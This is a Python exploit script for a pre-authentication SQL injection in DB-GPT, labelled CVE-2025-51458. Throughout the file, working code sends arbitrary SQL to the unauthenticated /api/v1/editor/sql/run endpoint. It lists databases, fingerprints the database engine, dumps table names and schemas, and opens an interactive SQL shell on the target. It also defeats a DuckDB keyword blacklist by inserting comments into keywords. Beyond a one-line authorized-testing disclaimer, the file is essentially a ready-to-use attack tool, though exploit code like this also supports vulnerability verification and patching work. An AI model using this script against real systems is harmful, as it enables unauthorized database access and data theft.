#!/usr/bin/env python3
"""
CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection

Affected: eosphoros-ai/DB-GPT <= 0.7.0
Endpoint: /api/v1/editor/sql/run, /api/v1/editor/chart/run
Type: Pre-Auth SQL Injection (bypass of CVE-2024-10835 / CVE-2024-10901 fix)

The sanitize_sql blacklist only covers DuckDB. MySQL/PostgreSQL/SQLite
connections pass raw SQL directly to query_ex() with no filtering.
DuckDB blacklist can be bypassed with comment obfuscation (SEL/**/ECT).

Intended for authorized testing of systems you own or have permission to
assess.

Usage:
    python3 exp.py TARGET DB_NAME [--sql "SELECT ..."]
    python3 exp.py TARGET DB_NAME --dump-tables
    python3 exp.py TARGET DB_NAME --dump-db
    python3 exp.py TARGET --list-dbs

With no action flag, an interactive "SQL> " prompt is started.
"""

import argparse
import json
import sys

import requests


def sql_run(target, db_name, sql):
    """POST *sql* to the editor ``sql/run`` endpoint and return its result.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.
        db_name: Value sent as ``db_name`` in the JSON payload.
        sql: Statement sent as ``sql`` in the JSON payload.

    Returns:
        ``(columns, values)`` taken from the response's ``data`` object when
        the response reports ``success``; ``(None, None)`` otherwise. The
        failure reason is printed to stderr.
    """
    url = f"{target.rstrip('/')}/api/v1/editor/sql/run"
    payload = {"db_name": db_name, "sql": sql}
    try:
        r = requests.post(url, json=payload, timeout=30)
        data = r.json()
        if data.get("success"):
            result = data.get("data", {})
            # NOTE(review): "colunms" (sic) is the key this script reads;
            # presumably it mirrors the server's spelling -- do not "fix" it
            # without confirming against the API response.
            columns = result.get("colunms", [])
            values = result.get("values", [])
            return columns, values
        print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
        return None, None
    except Exception as e:
        # Deliberately broad: this is a best-effort CLI, so transport errors,
        # non-JSON bodies and unexpected payload shapes are all reported the
        # same way instead of crashing with a traceback.
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None, None


def chart_run(target, db_name, sql, chart_type="bar"):
    """POST *sql* to the editor ``chart/run`` endpoint.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.
        db_name: Value sent as ``db_name`` in the JSON payload.
        sql: Statement sent as ``sql`` in the JSON payload.
        chart_type: Value sent as ``chart_type`` (default ``"bar"``).

    Returns:
        The response's ``data`` object when the response reports ``success``;
        ``None`` otherwise. The failure reason is printed to stderr.
    """
    url = f"{target.rstrip('/')}/api/v1/editor/chart/run"
    payload = {"db_name": db_name, "sql": sql, "chart_type": chart_type}
    try:
        r = requests.post(url, json=payload, timeout=30)
        data = r.json()
        if data.get("success"):
            return data.get("data", {})
        print(f"[-] Error: {data.get('err_msg', 'unknown')}", file=sys.stderr)
        return None
    except Exception as e:
        # Same best-effort policy as sql_run().
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None


def list_databases(target):
    """GET the editor ``db/list`` endpoint.

    Args:
        target: Base URL of the service; a trailing ``/`` is stripped.

    Returns:
        The response's ``data`` value (defaulting to ``[]``) when the response
        reports ``success``; ``None`` when it does not or when the request
        fails (the exception is printed to stderr).
    """
    url = f"{target.rstrip('/')}/api/v1/editor/db/list"
    try:
        r = requests.get(url, timeout=10)
        data = r.json()
        if data.get("success"):
            return data.get("data", [])
        return None
    except Exception as e:
        # Same best-effort policy as sql_run().
        print(f"[-] Request failed: {e}", file=sys.stderr)
        return None


def _cell(value):
    """Return the display text for one cell; only ``None`` becomes ``NULL``."""
    return "NULL" if value is None else str(value)


def print_table(columns, values):
    """Print *columns* and *values* as an aligned text table on stdout.

    Nothing is printed when *columns* is empty. Only ``None`` is rendered as
    ``NULL``; other falsy values such as ``0``, ``""`` and ``False`` are shown
    as themselves. Rows wider than the header are printed in full rather than
    raising.

    Args:
        columns: Sequence of column headings.
        values: Iterable of rows (each a sequence of cells); ``None`` is
            treated as no rows.
    """
    if not columns:
        return

    rows = [[_cell(v) for v in row] for row in (values or [])]

    widths = [len(str(c)) for c in columns]
    for row in rows:
        # A row may carry more cells than there are headings; grow the width
        # table instead of indexing past its end.
        if len(row) > len(widths):
            widths.extend([0] * (len(row) - len(widths)))
        for i, text in enumerate(row):
            widths[i] = max(widths[i], len(text))

    header = " | ".join(str(c).ljust(widths[i]) for i, c in enumerate(columns))
    sep = "-+-".join("-" * w for w in widths)
    print(header)
    print(sep)
    for row in rows:
        print(" | ".join(text.ljust(widths[i]) for i, text in enumerate(row)))
    print(f"\n({len(rows)} rows)")


def detect_db_type(target, db_name):
    """Guess the backend database engine by probing version functions.

    Issues ``SELECT VERSION()`` and classifies the returned text; if that
    yields nothing usable, falls back to ``SELECT sqlite_version()``.

    Args:
        target: Base URL of the service.
        db_name: Database name passed through to :func:`sql_run`.

    Returns:
        One of ``"postgresql"``, ``"mariadb"``, ``"mysql"``, ``"sqlite"`` or
        ``"unknown"``.
    """
    cols, vals = sql_run(target, db_name, "SELECT VERSION()")
    if cols and vals and vals[0]:
        version = str(vals[0][0]).lower()
        # PostgreSQL must be tested first: its banner also contains a dotted
        # version number, so the generic "." test below would claim it.
        if "postgresql" in version:
            return "postgresql"
        if "mariadb" in version:
            return "mariadb"
        if "." in version:
            return "mysql"

    cols, vals = sql_run(target, db_name, "SELECT sqlite_version()")
    if cols and vals:
        return "sqlite"
    return "unknown"


def _run_and_print(target, db_name, sql):
    """Run *sql* through :func:`sql_run` and print the result if it has columns."""
    cols, vals = sql_run(target, db_name, sql)
    if cols:
        print_table(cols, vals)


def main():
    """Parse command-line arguments and dispatch to the selected action.

    Actions are checked in this order: ``--list-dbs``, ``--sql``,
    ``--dump-tables``, ``--dump-db``; with none of them, an interactive
    prompt is started. Every action except ``--list-dbs`` requires the
    ``db_name`` positional argument.
    """
    parser = argparse.ArgumentParser(
        description="CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection"
    )
    parser.add_argument("target", help="Target URL (e.g. http://localhost:5670)")
    parser.add_argument("db_name", nargs="?", help="Database name")
    parser.add_argument("--sql", help="Custom SQL to execute")
    parser.add_argument(
        "--list-dbs", action="store_true", help="List available databases"
    )
    parser.add_argument(
        "--dump-tables", action="store_true", help="Dump table names"
    )
    parser.add_argument(
        "--dump-db", action="store_true", help="Dump all table structures"
    )
    # NOTE(review): --chart is parsed but never consulted below, and
    # chart_run() has no caller in this file. Either wire it up or drop it.
    parser.add_argument(
        "--chart", action="store_true", help="Use chart endpoint instead"
    )
    parser.add_argument(
        "--duckdb-bypass",
        action="store_true",
        help="Use comment obfuscation for DuckDB",
    )
    args = parser.parse_args()

    print("[*] CVE-2025-51458 - DB-GPT Pre-Auth SQL Injection")
    print(f"[*] Target: {args.target}")

    if args.list_dbs:
        dbs = list_databases(args.target)
        if dbs:
            print(f"\n[+] Found {len(dbs)} database(s):")
            for db in dbs:
                # Entries may be dicts or bare names; handle both.
                if isinstance(db, dict):
                    name = db.get("db_name", db)
                    db_type = db.get("db_type", "?")
                else:
                    name = db
                    db_type = "?"
                print(f" - {name} ({db_type})")
        else:
            print("[-] No databases found or endpoint not accessible")
        return

    if not args.db_name:
        parser.error("db_name is required unless using --list-dbs")

    if args.sql:
        sql = args.sql
        if args.duckdb_bypass:
            sql = sql.replace("SELECT", "SEL/**/ECT")
        print(f"[*] Executing: {sql}\n")
        _run_and_print(args.target, args.db_name, sql)
        return

    if args.dump_tables:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")
        if db_type in ("mysql", "mariadb"):
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = DATABASE()"
        elif db_type == "postgresql":
            sql = "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public'"
        elif db_type == "sqlite":
            sql = "SELECT name FROM sqlite_master WHERE type='table'"
        else:
            sql = "SELECT table_name FROM information_schema.tables"
        print("[*] Dumping tables...\n")
        _run_and_print(args.target, args.db_name, sql)
        return

    if args.dump_db:
        db_type = detect_db_type(args.target, args.db_name)
        print(f"[*] Detected DB type: {db_type}")
        if db_type in ("mysql", "mariadb"):
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = DATABASE() "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "postgresql":
            sql = (
                "SELECT table_name, column_name, data_type "
                "FROM information_schema.columns "
                "WHERE table_schema = 'public' "
                "ORDER BY table_name, ordinal_position"
            )
        elif db_type == "sqlite":
            # SQLite: get tables first, then PRAGMA for each
            cols, vals = sql_run(
                args.target,
                args.db_name,
                "SELECT name FROM sqlite_master WHERE type='table'",
            )
            if cols and vals:
                for row in vals:
                    table = row[0]
                    print(f"\n[*] Table: {table}")
                    # Double any single quote so a table name containing one
                    # does not terminate the string literal early.
                    quoted = str(table).replace("'", "''")
                    _run_and_print(
                        args.target,
                        args.db_name,
                        f"PRAGMA table_info('{quoted}')",
                    )
            return
        else:
            sql = "SELECT table_name, column_name, data_type FROM information_schema.columns"
        print("[*] Dumping schema...\n")
        _run_and_print(args.target, args.db_name, sql)
        return

    # Default: interactive mode
    print(f"[*] Database: {args.db_name}")
    print("[*] Interactive SQL mode. Type 'exit' to quit.\n")
    while True:
        try:
            sql = input("SQL> ").strip()
        except (EOFError, KeyboardInterrupt):
            print()
            break
        if not sql or sql.lower() == "exit":
            break
        if args.duckdb_bypass:
            sql = sql.replace("SELECT", "SEL/**/ECT")
        _run_and_print(args.target, args.db_name, sql)
        print()


if __name__ == "__main__":
    main()